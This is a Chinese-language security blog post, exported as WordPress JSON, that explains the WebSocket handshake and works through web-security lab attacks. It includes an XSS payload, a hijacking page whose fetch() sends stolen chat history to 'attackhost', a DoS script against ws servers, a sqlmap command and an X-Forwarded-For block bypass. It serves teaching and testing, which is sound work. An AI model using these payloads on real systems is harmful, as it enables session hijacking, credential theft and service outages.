{"id":1150,"date":"2023-01-23T23:16:00","date_gmt":"2023-01-23T15:16:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1150"},"modified":"2024-02-21T19:55:43","modified_gmt":"2024-02-21T11:55:43","slug":"websocket","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1150","title":{"rendered":"WebSocket"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">WebSocket\u662f\u4e00\u7a2e\u900f\u904e HTTP \u767c\u8d77\u7684\u96d9\u5411\u3001\u5168\u96d9\u5de5\u901a\u8a0a\u5354\u5b9a\u3002\u5b83\u5011\u901a\u5e38\u5728\u73fe\u4ee3 Web \u61c9\u7528\u7a0b\u5f0f\u4e2d\u7528\u65bc\u4e32\u6d41\u8cc7\u6599\u548c\u5176\u4ed6\u975e\u540c\u6b65\u6d41\u91cf\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u700f\u89bd\u5668\u5efa\u7acbwebsocket\u7684\u8acb\u6c42\u8aaa\u660e\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/chat\nHost: systw.net\nOrigin: https:\/\/systw.net\nConnection: Upgrade\nUpgrade: websocket\nSec-WebSocket-Key: Iv8io\/9s+lYFgZWcXczP8Q==\nSec-WebSocket-Version: 13<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Origin: \u7528\u6236\u7aef\u9801\u9762\u7684\u4f86\u6e90\u3002 WebSocket \u539f\u751f\u652f\u63f4\u8de8\u57df\uff0c\u5b83\u5141\u8a31\u4f3a\u670d\u5668\u6c7a\u5b9a\u662f\u5426\u4f7f\u7528 WebSocket \u8207\u8a72\u7db2\u7ad9\u901a\u8a0a\u3002<\/li>\n\n\n\n<li>Connection: Upgrade \u8868\u793a\u5ba2\u6236\u7aef\u60f3\u8981\u66f4\u6539\u5354\u5b9a\u3002<\/li>\n\n\n\n<li>Upgrade: websocket \u8acb\u6c42\u7684\u5354\u5b9a\u662fwebsocket\u3002<\/li>\n\n\n\n<li>Sec-WebSocket-Key \u700f\u89bd\u5668\u96a8\u6a5f\u7522\u751f\u7684\u5b89\u5168\u5bc6\u9470\u3002<\/li>\n\n\n\n<li>Sec-WebSocket-Version   \u5354\u5b9a\u7248\u672c\uff0c\u76ee\u524d\u70ba13\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u4f3a\u670d\u5668\u540c\u610f\u5207\u63db\u70ba WebSocket \u5354\u8b70\uff0c\u4f3a\u670d\u5668\u8fd4\u56de101\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>101 Switching Protocols\r\nUpgrade: websocket\r\nConnection: Upgrade\r\nSec-WebSocket-Accept: hsBlbuDTkk24srzEOTBUlZAlC2g=<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u9019\u88e1 Sec-WebSocket-Accept\u662f Sec-WebSocket-Key\uff0c\u662f\u4f7f\u7528\u7279\u6b8a\u7684\u6f14\u7b97\u6cd5\u91cd\u65b0\u7de8\u78bc\u7684\u3002 \u700f\u89bd\u5668\u4f7f\u7528\u5b83\u4f86\u78ba\u4fdd\u56de\u61c9\u8207\u8acb\u6c42\u76f8\u5c0d\u61c9\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\uff37SS<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0d\u5efa\u4f7f\u7528 ws:\/\/\uff0c\u5b83\u4e0d\u662f\u5b89\u5168\u50b3\u8f38\u3002\u5efa\u8b70\u4f7f\u7528 wss:\/\/\uff0c\u9019\u662f\u4e00\u500b\u66f4\u5b89\u5168\u7684\u5354\u8b70\uff0c\u5b83\u53ef\u4ee5\u9632\u6b62\u4e2d\u9593\u4eba\u653b\u64ca\u4e4b\u985e\u7684\u4e8b\u60c5\u3002\u56e0\u70ba\u5b89\u5168\u7684\u50b3\u8f38\u5f9e\u4e00\u958b\u59cb\u5c31\u53ef\u4ee5\u9632\u6b62\u8a31\u591a\u653b\u64ca<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5python \u9023\u63a5websocket\u70ba\u4f8b\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e00\u822c\u9023\u63a5  <code>python3 -m websockets ws:\/\/systw.net\/ws\/<\/code><\/li>\n\n\n\n<li>\u7528\u5b89\u5168\u50b3\u8f38\u9023\u63a5  <code>python3 -m websockets wss:\/\/systw.net\/ws\/<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">refer<br><a href=\"https:\/\/zh.javascript.info\/websocket\" target=\"_blank\" rel=\"noopener\">https:\/\/zh.javascript.info\/websocket<\/a><br><a href=\"https:\/\/www.goeasy.io\/articles\/650.html\" target=\"_blank\" rel=\"noopener\">https:\/\/www.goeasy.io\/articles\/650.html<\/a><\/p>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">websocket\u5b89\u5168<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">websocket\u5e38\u898b\u7684\u5b89\u5168\u554f\u984c\u6709<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>XSS<\/li>\n\n\n\n<li>hijacking<\/li>\n\n\n\n<li>DoS<\/li>\n\n\n\n<li>SQL injuection<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">XSS<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5927\u591a\u6578 WebSocket \u6f0f\u6d1e\u90fd\u662f\u900f\u904e\u7be1\u6539 WebSocket \u8a0a\u606f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5982\uff0c\u804a\u5929\u61c9\u7528\u7a0b\u5f0f\u4f7f\u7528 WebSocket \u5728\u700f\u89bd\u5668\u548c\u4f3a\u670d\u5668\u4e4b\u9593\u767c\u9001\u804a\u5929\u8a0a\u606f\u3002\u7576\u4f7f\u7528\u8005\u8f38\u5165\u804a\u5929\u8a0a\u606f\u6642\uff0c\u5c07\u5411\u4f3a\u670d\u5668\u767c\u9001\u5982\u4e0b\u6240\u793a\u7684 WebSocket \u8a0a\u606f\uff1a<code>{\"message\":\"Hello Carlos\"}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u5f8c\u4f3a\u670d\u5668\u5c07\u8a0a\u606f\u5167\u5bb9\u900f\u904e WebSockets\u50b3\u5230\u53e6\u4e00\u500b\u804a\u5929\u7528\u6236\uff0c\u4e26\u5728\u7528\u6236\u7684\u700f\u89bd\u5668\u4e2d\u5448\u73fe\u5982\u4e0b\uff1a<code>&lt;td&gt;Hello Carlos&lt;\/td&gt;<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u9019\u7a2e\u60c5\u6cc1\u4e0b\uff0c\u5982\u679c\u6c92\u6709\u5176\u4ed6\u8f38\u5165\u8655\u7406\u6216\u9632\u79a6\u8d77\u4f5c\u7528\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u900f\u904e\u63d0\u4ea4\u4ee5\u4e0b WebSocket \u8a0a\u606f\u4f86\u57f7\u884c XSS \u653b\u64ca\uff1a<code>{\"message\":\"&lt;img src=1 onerror='alert(1)'&gt;\"}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: Manipulating WebSocket messages to exploit vulnerabilities<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">hijacking<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u900f\u904echat\u8207websocket\u5efa\u7acb\u9023\u7dda\uff0c\u8acb\u6c42\u5927\u81f4\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/chat HTTP\/1.1\nHost: 0ae1001c04f50fd0c0da015900a200b0.web-security-academy.net\nConnection: Upgrade\nPragma: no-cache\nCache-Control: no-cache\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/103.0.0.0 Safari\/537.36\nUpgrade: websocket\nOrigin: https:\/\/0ae1001c04f50fd0c0da015900a200b0.web-security-academy.net\nSec-WebSocket-Version: 13\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: session=Fd5tcbzt1pI5dyZKqlQh5C5mnkut8tlJ\nSec-WebSocket-Key: UFtiwjoGeYFodJPCYSWiGg==<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8207websocket\u5efa\u7acb\u9023\u7dda\u5f8c\u958b\u59cb\u8a0a\u606f\u4ea4\u63db<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>to server\r\n\tREADY\r\nto client\r\n\t{\"user\":\"CONNECTED\",\"content\":\"-- Now chatting with Hal Pline --\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ed4\u7d30\u89c0\u5bdf\u9019\u500bwebsocket\u5efa\u7acb\u7684\u8acb\u6c42\u5f8c\u767c\u73fe3\u500b\u98a8\u96aa<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u9019\u500b\u8acb\u6c42\u6c92\u6709\u4f7f\u7528CSRF-TOKEN\uff0c\u56e0\u6b64\u53ef\u4ee5\u52ab\u6301\u4f7f\u7528\u8005\u7684\u9023\u7dda<\/li>\n\n\n\n<li>\u5c0dwebsocket\u50b3\u9001READY\uff0c\u53ef\u986f\u793a\u904e\u53bb\u7684\u804a\u5929\u8a18\u9304<\/li>\n\n\n\n<li>Origin\u5167\u5bb9\u62ff\u6389\u4e5f\u53ef\u6b63\u5e38\u904b\u4f5c\uff0c\u8868\u793a\u76ee\u6a19\u672a\u505aOrigin\u9650\u5236\uff0c\u4efb\u4f55\u4f86\u6e90\u90fd\u53ef\u4ee5\u4f7f\u7528websocket<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u57fa\u65bc\u9019\u4e9b\u98a8\u96aa\uff0c\u53ef\u4ee5\u6e96\u5099\u4ee5\u4e0b\u653b\u64ca\u9801\u9762<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;script>\r\nwebsocket = new WebSocket('wss:\/\/websockethost\/chat')\r\nwebsocket.onopen = start\r\nwebsocket.onmessage = handleReply\r\nfunction start(event) {\r\n  websocket.send(\"READY\");\r\n}\r\nfunction handleReply(event) {\r\n  fetch('https:\/\/attackhost\/?'+event.data, {mode: 'no-cors'})\r\n}\r\n&lt;\/script><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7576\u4f7f\u7528\u8005\u958b\u555f\u6b64\u653b\u64ca\u9801\u9762\uff0c\u6703\u4ee5\u4f7f\u7528\u8005\u8eab\u4efd\u8207websocket\u5efa\u7acb\u9023\u7dda\uff0c\u63a5\u8457\u50b3\u9001READY\u7d66\u76ee\u6a19\u53d6\u5f97\u904e\u53bb\u7684\u804a\u5929\u8a18\u9304\u3002\u53ea\u8981\u5230\u653b\u64ca\u8005\u4e3b\u6a5f<code>attackhost<\/code>\u67e5\u8a62\u5373\u53ef\uff0c\u5167\u5bb9\u5927\u81f4\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/?{%22user%22:%22You%22,%22content%22:%22I%20forgot%20my%20password%22} HTTP\/1.1\r\n...omit...\r\nGET \/?{%22user%22:%22Hal%20Pline%22,%22content%22:%22No%20problem%20carlos,%20it&amp;apos;s%209wrc07ttgnx80bkhpv4x%22} HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u628awebsocket\u50b3\u904e\u4f86\u7684\u6b77\u53f2\u804a\u5929\u8a18\u9304urldecode\u5f8c\uff0c\u53ef\u4ee5\u767c\u73fe\u4f7f\u7528\u8005\u7684\u5bc6\u78bc 9wrc07ttgnx80bkhpv4x<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/?{\"user\":\"Hal Pline\",\"content\":\"No problem carlos, it's 9wrc07ttgnx80bkhpv4x\"} HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: Cross-site WebSocket hijacking<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">refer<br><a href=\"https:\/\/christian-schneider.net\/CrossSiteWebSocketHijacking.html\" target=\"_blank\" rel=\"noopener\">https:\/\/christian-schneider.net\/CrossSiteWebSocketHijacking.html<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">DoS<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">WebSocket \u9810\u8a2d\u5141\u8a31\u4e0d\u53d7\u9650\u5236\u7684\u8de8\u57df\u8abf\u7528\uff0c\u9019\u6703\u5c0e\u81f4 DoS \u6f0f\u6d1e\u3002 \u4ee5\u4e0b\u662f\u5c0e\u81f4 WebSocket \u4f3a\u670d\u5668\u5d29\u6f70\u7684\u5e38\u898b\u8173\u672c\uff0c\u8a72\u8173\u672c\u6703\u5f71\u97ff\u67d0\u4e9b ws \u7528\u6236\u7aef\u7248\u672c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>const WebSocket = require('ws'); \r\nconst net = require('net'); \r\nconst wss = new WebSocket.Server({ port: 3000 }, function () { \r\n  const payload = 'constructor';  \/\/ or ',;constructor' \r\nconst request = &#91; \r\n    'GET \/ HTTP\/1.1', \r\n    'Connection: Upgrade', \r\n    'Sec-WebSocket-Key: test', \r\n    'Sec-WebSocket-Version: 8', \r\n    `Sec-WebSocket-Extensions: ${payload}`, \r\n    'Upgrade: websocket', \r\n    '\\r\\n' \r\n  ].join('\\r\\n'); \r\nconst socket = net.connect(3000, function () { \r\n    socket.resume(); \r\n    socket.write(request); \r\n  }); \r\n});<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">refer<br>https:\/\/www.cobalt.io\/blog\/a-pentesters-guide-to-websocket-pentesting<br>https:\/\/brightsec.com\/blog\/websocket-security-top-vulnerabilities\/<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">SQL Injection<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u76f4\u63a5\u900f\u904esqlmap\u8dd1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap --url \"ws:\/\/systw.net\/ws\/\" --data='{\"status\":\"database\",\"token\":\"sefji8aeaesfrhj2984afb\"}' -v 3  <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u53ef\u4ee5\u4f7f\u7528sqlmap\u642d\u914d\u900f\u904e\u4e2d\u8f49\u5de5\u5177\u50cf\u662fWs-Harness<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">refer<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.freebuf.com\/articles\/web\/281451.html\" target=\"_blank\" rel=\"noopener\">https:\/\/www.freebuf.com\/articles\/web\/281451.html<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/2h3ph3rd.medium.com\/sqlmap-over-websockets-353cdcd9a7ab\" target=\"_blank\" rel=\"noopener\">https:\/\/2h3ph3rd.medium.com\/sqlmap-over-websockets-353cdcd9a7ab<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/zero-s4n.hashnode.dev\/fuzzing-websocket-messages-on-burpsuite\" target=\"_blank\" rel=\"noopener\">https:\/\/zero-s4n.hashnode.dev\/fuzzing-websocket-messages-on-burpsuite<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5176\u4ed6\u88dc\u5145<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u67d0\u4e9b\u7cfb\u7d71\u5075\u6e2c\u5230\u653b\u64ca\u6703\u628aIP\u52a0\u5165\u9ed1\u540d\u55ae\uff0c\u8b93IP\u5c31\u7121\u6cd5\u8207websocket\u5efa\u7acb\u9023\u7dda,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u4e0b\u70bawebsocket\u7684\u4f8b\u5b50<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>to server{\"message\":\"test\"}\nto client{\"user\":\"You\",\"content\":\"test\"}\nto server{\"message\":\"&lt;img src=1 onerror='alert(1)'&gt;\"}\nto client {\"error\":\"Attack detected: Event handler\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">server\u767c\u73fe\u6709\u653b\u64ca\u884c\u70ba\uff0c\u63a5\u8457client\u5c31\u7121\u6cd5\u8207websocket\u5efa\u7acb\u9023\u7dda<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u5982\u679c\u5728\u91cd\u65b0\u5efa\u9023\u7dda\u6642\u900f\u904eX-Forwarded-For\u63db\u4e0d\u540cIP\uff0c\u5c31\u80fd\u9a19\u904eserver\uff0c\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/chat HTTP\/1.1\nX-Forwarded-For: 1.1.1.2<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u63a5\u8457\u5c31\u53ef\u4ee5\u548cwebsocket\u5efa\u7acb\u9023\u7dda\u884c\u70ba\uff0c\u4e26\u7e7c\u7e8c\u5617\u8a66\u653b\u64ca\u884c\u70ba<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>to server{\"message\":\"&lt;img src=1 onerror='alert(1)'&gt;\"}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Lab:Manipulating the WebSocket handshake to exploit vulnerabilities<\/p>\n","protected":false},"excerpt":{"rendered":"<p>WebSocket\u662f\u4e00\u7a2e\u900f\u904e HTTP \u767c\u8d77\u7684\u96d9\u5411\u3001\u5168\u96d9\u5de5\u901a &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[],"class_list":["post-1150","post","type-post","status-publish","format-standard","hentry","category-clientside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1150","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1150"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1150\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1150"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1150"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1150"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}